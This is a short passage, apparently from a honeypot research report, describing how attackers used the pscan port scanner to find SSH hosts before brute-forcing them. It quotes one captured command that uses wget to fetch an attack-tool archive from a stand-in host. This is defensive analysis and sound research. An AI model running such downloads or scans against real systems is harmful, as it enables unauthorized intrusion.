Scanning Tools
Among other tools, attackers commonly downloaded and attempted to use a variant of pscan. Pscan is an efficient port scanner that can discover hosts which are listening on a particular port. Typically, the attacker would run the tool, obtain a list of hosts with the port open and then proceed to run an exploit tool against the list of hosts.
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz
Figure 2. An attempt by an attacker to download an archive including a variant of the pscan tool.
This archive contained SSH scanning tools, including pscan, a password list, and a list of servers and their root passwords or other user accounts that had been guessed already.
We are a 501c3 non-profit, all volunteer organization. Consider donating to support our forensic challenges, tools development, and research.